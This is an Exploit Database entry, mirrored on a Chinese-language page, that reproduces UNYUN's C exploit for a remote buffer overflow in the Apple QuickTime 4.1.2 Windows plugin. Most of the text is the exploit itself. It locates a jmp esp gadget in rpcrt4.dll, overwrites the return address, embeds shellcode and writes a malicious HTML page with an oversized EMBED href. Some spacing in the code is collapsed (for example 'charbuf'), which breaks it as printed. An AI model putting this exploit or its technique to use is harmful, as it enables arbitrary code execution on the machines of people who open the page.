Apple QuickTime plugin – Windows 4.1.2 (Japanese) Remote Overflow

• Exploit Database
• 14 阅读

• 作者： UNYUN
  日期： 2012-08-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20605/

• source: https://www.securityfocus.com/bid/2328/info
  
  Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.
  
  A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. 
  
  /*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
  */
  
  #include<stdio.h>
  #include<stdlib.h>
  #include<windows.h>
  
  #define MOV_FILE"c:\\program files\\quicktime\\sample.mov"
  #define HEIGHT60
  #define WIDTH 60
  #define TARGET"QUICKTIMEPLAYER"
  #define FILE_IMAGE\
  "<html><embed src=\"%s\" href=\"%s\" "\
  "width=%d height=%d autoplay=\"true\" "\
  "target=\"%s\"><br></html>"
  #define BUFSIZE 730
  #define RET 684
  #define ESP_TGT "rpcrt4.dll"
  #define JMPESP_10xff
  #define JMPESP_20xe4
  #define NOP 0x90
  
  unsigned char exploit_code[200]={
  0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
  0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
  0xFF,0xD0,0x00,
  };
  
  main(int argc,char *argv[])
  {
  FILE*fp;
  charbuf[BUFSIZE];
  unsigned inti,pretadr,p,ip,kp;
  MEMORY_BASIC_INFORMATION meminfo;
  
  if (argc<2){
  printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
   argv[0]);
  exit(1);
  }
  
  if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
   printf("%s is not found.\n",ESP_TGT);
   exit(1);
  }
  
  VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
  pretadr=0;
  for (i=0;i<meminfo.RegionSize;i++){
  p=kp+i;
  if (( p &0xff)==0
   || ((p>>8 )&0xff)==0
   || ((p>>16)&0xff)==0
   || ((p>>24)&0xff)==0) continue;
  if ( *((unsigned char *)p)==JMPESP_1
  && *(((unsigned char *)p)+1)==JMPESP_2)
  pretadr=p;
  }
  if ((fp=fopen(argv[1],"wb"))==NULL){
  printf("File write error \"%s\"\n",argv[1]);
  exit(1);
  }
  memset(buf,NOP,BUFSIZE);
  memcpy(buf+700-12,exploit_code,strlen(exploit_code));
  buf[BUFSIZE-2]=0;
  
  ip=pretadr;
  printf("EIP=%x\n",ip);
  buf[RET]=ip&0xff;
  buf[RET+1]=(ip>>8)&0xff;
  buf[RET+2]=(ip>>16)&0xff;
  buf[RET+3]=(ip>>24)&0xff;
  
  if (argc==2)
  fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
  else
  fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
  fclose(fp);
  printf("Done.\n");
   }
  
  -----
  UNYUN
  % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin@backsection.net (SPS-Official)
   unyun@shadowpenguin.org (Personal)
  % eEye Digital Security Team [ http://www.eEye.com ]
   unyun@eEye.com